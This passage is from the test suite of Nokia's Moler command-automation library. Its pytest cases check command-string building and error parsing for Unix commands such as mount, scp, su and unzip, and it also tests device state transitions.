mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t ext3', device='/tmp/disk.img',
directory='/mnt')
assert "mount -t ext3 /tmp/disk.img /mnt" == mount_cmd.command_string
def test_mount_raise_exception_only_root(buffer_connection, command_output_and_expected_result_only_root_error):
command_output, expected_result = command_output_and_expected_result_only_root_error
buffer_connection.remote_inject_response([command_output])
mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t ext3', device='/tmp/disk.img',
directory='/mnt')
with pytest.raises(CommandFailure):
mount_cmd()
def test_mount_raise_exception_write_protected(buffer_connection, command_output_and_expected_result_write_protected_error):
command_output, expected_result = command_output_and_expected_result_write_protected_error
buffer_connection.remote_inject_response([command_output])
mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t iso9660', device='virtio-win.iso',
directory='/mnt')
with pytest.raises(CommandFailure):
mount_cmd()
@pytest.fixture
def command_output_and_expected_result_only_root_error():
data = """xyz@debian:~$ mount -t ext3 /tmp/disk.img /mnt
mount: only root can use "--types" option
xyz@debian:~$"""
result = dict()
return data, result
@pytest.fixture
def command_output_and_expected_result_write_protected_error():
data = """root@debian:~$ mount -t iso9660 virtio-win.iso /mnt
mount: /dev/loop0 is write-protected, mounting read-only
root@debian:~$"""
result = dict()
return data, result
```
#### File: cmd/unix/test_cmd_mpstat.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
_email_ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.mpstat import Mpstat
def test_mpstat_returns_proper_command_string(buffer_connection):
mpstat_cmd = Mpstat(connection=buffer_connection.moler_connection, options="-P 0")
assert "mpstat -P 0" == mpstat_cmd.command_string
def test_mpstat_wrong_value(buffer_connection):
wrong_output = """
user@dev:~# mpstat
Linux 4.4.112-rt127 (type) 05/10/18 _armv7l_ (4 CPU)
11:07:06 CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
11:07:06 all WO 0.07 2.28 0.50 0.00 0.17 0.00 0.00 95.49
user@dev:~# """
buffer_connection.remote_inject_response([wrong_output])
cmd = Mpstat(connection=buffer_connection.moler_connection)
ret = cmd()
expected_ret = {'cpu': {}}
assert ret == expected_ret
```
#### File: cmd/unix/test_cmd_ping.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
_email_ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.ping import Ping
def test_ping_returns_proper_command_string(buffer_connection):
ping_cmd = Ping(buffer_connection, destination="localhost", options="-c 5")
assert "ping localhost -c 5" == ping_cmd.command_string
def test_ping_observer_timeout(buffer_connection):
from moler.exceptions import CommandTimeout
cmd_ping = Ping(buffer_connection.moler_connection, destination='localhost')
cmd_ping.terminating_timeout = 0
with pytest.raises(CommandTimeout):
cmd_ping(timeout=0.1)
```
#### File: cmd/unix/test_cmd_scp.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.scp import Scp
from moler.exceptions import CommandFailure
import re
import pytest
def test_scp_returns_proper_command_string(buffer_connection):
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="/home/ute/test",
dest="ute@localhost:/home/ute")
assert "scp /home/ute/test ute@localhost:/home/ute" == scp_cmd.command_string
def test_scp_works_properly_on_slice_string(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = slice_index
scp_cmd._max_index_from_end = slice_index
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existng string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m.group(0) == beginning_command_string[:slice_index]
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m.group(0) == finish_command_string[-slice_index:]
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_works_properly_on_slice_string_beginning(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = slice_index
scp_cmd._max_index_from_end = 0
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existng string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m.group(0) == beginning_command_string[:slice_index]
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m is None
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_works_properly_on_slice_string_end(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = 0
scp_cmd._max_index_from_end = slice_index
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existng string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m is None
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m.group(0) == finish_command_string[-slice_index:]
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_raise_exception_failure(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
ute@localhost's password:
test: not a regular file
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_no_key_file(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?".
Host key verification failed.
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_no_known_hosts_on_failure(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ """
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_permission_denied(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
Permission denied, please try again.
ute@localhost's password:
Permission denied, please try again.
ute@localhost's ldap password:
Permission denied (publickey,password).
lost connection
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_not_a_directory(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
Not a directory
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_ldap_password(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ute@localhost's ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="", password="<PASSWORD>", repeat_password=False)
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_ldap_password_coppied(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ute@localhost's ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
passwords = ("<PASSWORD>", "<PASSWORD>")
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="", password=passwords)
scp_cmd()
assert len(passwords) == 2
assert passwords[0] == "<PASSWORD>"
assert passwords[1] == "<PASSWORD>"
```
#### File: cmd/unix/test_cmd_su.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.su import Su
from moler.exceptions import CommandFailure
def test_su_returns_proper_command_string(buffer_connection):
cmd = Su(buffer_connection, login='xyz', options='-p', password="<PASSWORD>", prompt=None, newline_chars=None)
assert "su -p xyz" == cmd.command_string
def test_su_returns_proper_command_string_pwd(buffer_connection):
cmd = Su(buffer_connection, cmd_class_name='moler.cmd.unix.pwd.Pwd')
assert "su -c 'pwd'" == cmd.command_string
def test_su_catches_authentication_failure(buffer_connection, command_output_and_expected_result_auth):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_auth
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection, prompt=r"xyz@debian:", expected_prompt=r"root@debian")
with pytest.raises(CommandFailure):
su_cmd()
def test_su_catches_command_format_failure(buffer_connection,
command_output_and_expected_result_command_format_failure):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_command_format_failure
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
su_cmd()
def test_su_catches_username_failure(buffer_connection, command_output_and_expected_result_username_failure):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_username_failure
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
su_cmd()
def test_sudo_su(buffer_connection):
from moler.cmd.unix.sudo import Sudo
command_output = """sudo su -c 'pwd'
/home/auto/inv
moler_bash#"""
expected_dict = {'full_path': '/home/auto/inv', 'path_to_current': '/home/auto', 'current_path': 'inv'}
buffer_connection.remote_inject_response([command_output])
cmd_su = Su(connection=buffer_connection.moler_connection, prompt=r"moler_bash#",
cmd_class_name='moler.cmd.unix.pwd.Pwd')
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_object=cmd_su)
ret = cmd_sudo()
assert ret == expected_dict
def test_sudo_su_object(buffer_connection, command_output_and_expected_result_ls_l):
from moler.cmd.unix.sudo import Sudo
from moler.cmd.unix.ls import Ls
command_output = command_output_and_expected_result_ls_l[0]
expected_dict = command_output_and_expected_result_ls_l[1]
buffer_connection.remote_inject_response([command_output])
cmd_ls = Ls(connection=buffer_connection.moler_connection, options="-l")
cmd_su = Su(connection=buffer_connection.moler_connection, cmd_object=cmd_ls)
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_object=cmd_su)
ret = cmd_sudo()
assert ret == expected_dict
def test_sudo_su_only_params(buffer_connection, command_output_and_expected_result_ls_l):
from moler.cmd.unix.sudo import Sudo
command_output = command_output_and_expected_result_ls_l[0]
expected_dict = command_output_and_expected_result_ls_l[1]
buffer_connection.remote_inject_response([command_output])
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_class_name="moler.cmd.unix.su.Su",
cmd_params={'cmd_class_name': 'moler.cmd.unix.ls.Ls', 'cmd_params': {'options': '-l'}})
ret = cmd_sudo()
assert ret == expected_dict
def test_failing_calling_twice_the_same_command_object(buffer_connection, command_output_and_expected_result_pwd):
from moler.cmd.unix.pwd import Pwd
command_output, expected_result = command_output_and_expected_result_pwd
buffer_connection.remote_inject_response([command_output])
cmd_pwd = Pwd(connection=buffer_connection.moler_connection)
cmd_su = Su(connection=buffer_connection.moler_connection, password="<PASSWORD>", cmd_object=cmd_pwd)
result = cmd_su()
assert result == expected_result
cmd_sudo = Su(connection=buffer_connection.moler_connection, password="<PASSWORD>", cmd_object=cmd_pwd)
with pytest.raises(CommandFailure):
cmd_sudo()
def test_failing_with_both_parameters(buffer_connection):
from moler.cmd.unix.cp import Cp
cmd_cp = Cp(connection=buffer_connection.moler_connection, src="src", dst="dst")
cmd_sudo = Su(connection=buffer_connection.moler_connection, cmd_class_name="moler.cmd.unix.cp.Cp",
cmd_object=cmd_cp, password="<PASSWORD>")
with pytest.raises(CommandFailure) as err:
cmd_sudo(timeout=0.2)
assert "Both 'cmd_object' and 'cmd_class_name' parameters were provided" in str(err.value)
def test_su_catches_missing_binary_failure(buffer_connection):
from moler.exceptions import CommandFailure
buffer_connection.remote_inject_response(["xyz@debian:~/Moler$ su\n",
"/system/bin/sh: su: not found\n",
"xyz@debian:~/Moler$"])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure) as err:
su_cmd()
assert "/system/bin/sh: su: not found" in str(err.value)
@pytest.fixture
def command_output_and_expected_result_auth():
output = """xyz@debian:~/Moler$ su
Password:
su: Authentication failure
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_command_format_failure():
output = """xyz@debian:~/Moler$ su -g
su: invalid option -- 'g'
Usage: su [options] [LOGIN]
Options:
-c, --command COMMAND pass COMMAND to the invoked shell
-h, --help display this help message and exit
-, -l, --login make the shell a login shell
-m, -p,
--preserve-environment do not reset environment variables, and
keep the same shell
-s, --shell SHELL use SHELL instead of the default in passwd
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_username_failure():
output = """xyz@debian:~/Moler$ su kla
No passwd entry for user 'kla'
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_ls_l():
output = """sudo su -c 'ls -l'
total 8
drwxr-xr-x 2 root root 4096 Sep 25 2014 bin
-rw-r--r-- 1 root root 51 Dec 15 10:48 getfzmip.txt
-rw-r--r-- 1 root root 24 Dec 15 10:48 getfzmip.txt-old.20171215-104858.txt
lrwxrwxrwx 1 root root 10 Mar 20 2015 logsremote -> /mnt/logs/
moler_bash#"""
result = {
"total": {
"raw": "8",
"bytes": 8,
},
"files": {
"bin": {"permissions": "drwxr-xr-x", "hard_links_count": 2, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Sep 25 2014", "name": "bin", },
"getfzmip.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 51, "size_raw": "51", "date": "Dec 15 10:48", "name": "getfzmip.txt", },
"getfzmip.txt-old.20171215-104858.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1,
"owner": "root",
"group": "root", "size_bytes": 24, "size_raw": "24",
"date": "Dec 15 10:48",
"name": "getfzmip.txt-old.20171215-104858.txt", },
"logsremote": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 10, "size_raw": "10", "date": "Mar 20 2015", "name": "logsremote",
"link": "/mnt/logs/"},
},
}
return output, result
@pytest.fixture()
def command_output_and_expected_result_pwd():
output = """user@client:~/moler$ su -c 'pwd'
password:
/home/user/moler
ute@debdev:~/moler$ """
result = {
'current_path': 'moler',
'full_path': '/home/user/moler',
'path_to_current': '/home/user'
}
return output, result
```
#### File: cmd/unix/test_cmd_top.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.top import Top
from moler.exceptions import CommandFailure
def test_top_returns_proper_command_string(buffer_connection):
top_cmd = Top(buffer_connection, options='-n 3 -S -u root')
assert "top -n 3 -S -u root n 1" == top_cmd.command_string
def test_top_raise_error_on_bad_option(buffer_connection, command_output_and_expected_result_on_bad_option):
top_cmd = Top(connection=buffer_connection.moler_connection, options='abc')
command_output, expected_result = command_output_and_expected_result_on_bad_option
buffer_connection.remote_inject_response([command_output])
assert 'top abc n 1' == top_cmd.command_string
with pytest.raises(CommandFailure):
top_cmd()
@pytest.fixture
def command_output_and_expected_result_on_bad_option():
output = """xyz@debian>top abc n 1
top: unknown option 'a'
Usage:
top -hv | -bcHiOSs -d secs -n max -u|U user -p pid(s) -o field -w [cols]
xyz@debian>"""
result = dict()
return output, result
```
#### File: cmd/unix/test_cmd_uname.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.exceptions import CommandFailure
from moler.cmd.unix.uname import Uname
import pytest
def test_uname_returns_proper_command_string(buffer_connection):
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="-a")
assert "uname -a" == uname_cmd.command_string
def test_uname_raise_exception_wrong_option(buffer_connection, command_output_and_expected_result_option):
command_output, expected_result = command_output_and_expected_result_option
buffer_connection.remote_inject_response([command_output])
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="-pk")
with pytest.raises(CommandFailure):
uname_cmd()
def test_uname_raise_exception_wrong_command(buffer_connection, command_output_and_expected_result_command):
command_output, expected_result = command_output_and_expected_result_command
buffer_connection.remote_inject_response([command_output])
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="gh")
with pytest.raises(CommandFailure):
uname_cmd()
@pytest.fixture
def command_output_and_expected_result_option():
data = """xyz@debian:~/Moler/$ uname -pk
uname: invalid option -- 'k'
Try 'uname --help' for more information.
xyz@debian:~/Moler/$"""
result = dict()
return data, result
@pytest.fixture
def command_output_and_expected_result_command():
data = """xyz@debian:~/Moler/$ uname gh
uname: extra operand 'gh'
Try 'uname --help' for more information.
xyz@debian:~/Moler/$"""
result = dict()
return data, result
```
#### File: cmd/unix/test_cmd_unzip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.exceptions import CommandFailure
from moler.cmd.unix.unzip import Unzip
def test_unzip_returns_fail(buffer_connection):
"""
Test if proper alarm is raised when unzip tries to extract the invalid file.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
ute@debdev:~$ unzip test.zip
unzip: cannot find or open test.zip, test.zip.zip or test.zip.ZIP.
ute@debdev:~$
"""
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip")
with pytest.raises(CommandFailure):
cmd()
def test_unzip_forbidden_to_overwrite(buffer_connection):
"""
Test if proper alarm is raised when unzip is not allowed to overwrite the existing file.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
host:~ # unzip test.zip
Archive: test.zip
replace test.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename: N
host:~ # """
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip")
with pytest.raises(CommandFailure):
cmd()
def test_unzip_filename_not_matched(buffer_connection):
"""
Test if exception is raised when a directory cannot be created.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
host:~ # unzip test.zip -d test/test
Archive: test.zip
checkdir: cannot create extraction directory: test/test
No such file or directory
host:~ # """
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip", extract_dir="test/test")
with pytest.raises(CommandFailure):
cmd()
```
#### File: test/device/test_SM_at_remote.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.util.devices_SM import iterate_over_device_states, get_device
def test_at_remote_device(device_connection, at_remote_output):
at_remote = get_device(name="AT_REMOTE", connection=device_connection, device_output=at_remote_output,
test_file_path=__file__)
iterate_over_device_states(device=at_remote)
@pytest.fixture
def at_remote_output():
plink_cmd_string = 'plink -serial COM5 |& awk \'BEGIN {print "COM5> port READY"} {print} END {print "^C"}\''
output = {
"UNIX_LOCAL": {
'TERM=xterm-mono ssh -l remote_login -o ServerAliveInterval=7 -o ServerAliveCountMax=2 remote_host': 'remote#',
'su': 'local_root_prompt'
},
"UNIX_LOCAL_ROOT": {
'exit': 'moler_bash#'
},
"UNIX_REMOTE": {
'exit': 'moler_bash#',
'su': 'remote_root_prompt',
plink_cmd_string: 'COM5>'
},
"AT_REMOTE": {
'\x03': '^C\nremote#',
},
"UNIX_REMOTE_ROOT": {
'exit': 'remote#',
},
}
return output
```
#### File: test/integration/test_devices_SM.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2020-2021, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
import sys
from moler.device import DeviceFactory
python3_only = pytest.mark.skipif(sys.version_info < (3, 0),
reason="Not stable under Python2 which is no more supported.")
@python3_only
def test_proxy_pc_with_sshshell(loaded_proxy_pc_config):
dev = DeviceFactory.get_device(name="PROXY")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_proxy_pc_with_sshshell_cant_use_unix_local_states(loaded_proxy_pc_config):
with pytest.raises(ValueError) as err:
DeviceFactory.get_device(name="PROXY", initial_state="UNIX_LOCAL")
assert "has no UNIX_LOCAL/UNIX_LOCAL_ROOT states" in str(err.value)
assert "since it uses following io: ThreadedSshShell" in str(err.value)
assert 'You need io of type "terminal" to have unix-local states' in str(err.value)
@python3_only
def test_proxy_pc_with_terminal_can_use_unix_local_states(loaded_proxy_pc_config, uxlocal2proxypc_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="PROXY",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2proxypc_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_only(loaded_unix_remote_config):
dev = DeviceFactory.get_device(name="UX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_via_proxy_pc(loaded_unix_remote_config, proxypc2uxroot_connection_hops):
dev = DeviceFactory.get_device(name="UX_REMOTE", initial_state="PROXY_PC",
connection_desc={'io_type': 'sshshell',
'host': 'localhost',
'login': 'sshproxy',
'password': '<PASSWORD>'},
connection_hops=proxypc2uxroot_connection_hops)
assert dev._use_proxy_pc is True
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_cant_use_unix_local_states(loaded_unix_remote_config):
with pytest.raises(ValueError) as err:
DeviceFactory.get_device(name="UX_REMOTE", initial_state="UNIX_LOCAL")
assert "has no UNIX_LOCAL/UNIX_LOCAL_ROOT states" in str(err.value)
assert "since it uses following io: ThreadedSshShell" in str(err.value)
assert 'You need io of type "terminal" to have unix-local states' in str(err.value)
@python3_only
def test_unix_remote_with_terminal_can_use_unix_local_states(loaded_unix_remote_config, uxlocal2uxremote_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="UX_REMOTE",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2uxremote_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_sshshell_only(loaded_adb_device_config):
dev = DeviceFactory.get_device(name="ADB_LHOST")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_sshshell_via_proxy_pc(loaded_adb_device_config, proxypc2adbshell_connection_hops):
dev = DeviceFactory.get_device(name="ADB_LHOST", initial_state="PROXY_PC",
connection_desc={'io_type': 'sshshell',
'host': 'localhost',
'login': 'sshproxy',
'password': '<PASSWORD>'},
connection_hops=proxypc2adbshell_connection_hops)
assert dev._use_proxy_pc is True
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("ADB_SHELL")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_terminal_can_use_unix_local_states(loaded_adb_device_config, uxlocal2adbshell_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="ADB_LHOST",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2adbshell_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("ADB_SHELL")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
# ------------------------------------------------------------
@pytest.fixture
def empty_connections_config():
import mock
import moler.config.connections as conn_cfg
default_variant = {"terminal": "threaded", "sshshell": "threaded"}
with mock.patch.object(conn_cfg, "default_variant", default_variant):
with mock.patch.object(conn_cfg, "named_connections", {}):
yield conn_cfg
@pytest.fixture()
def empty_devices_config():
import mock
import moler.config.devices as dev_cfg
empty_named_devices = {}
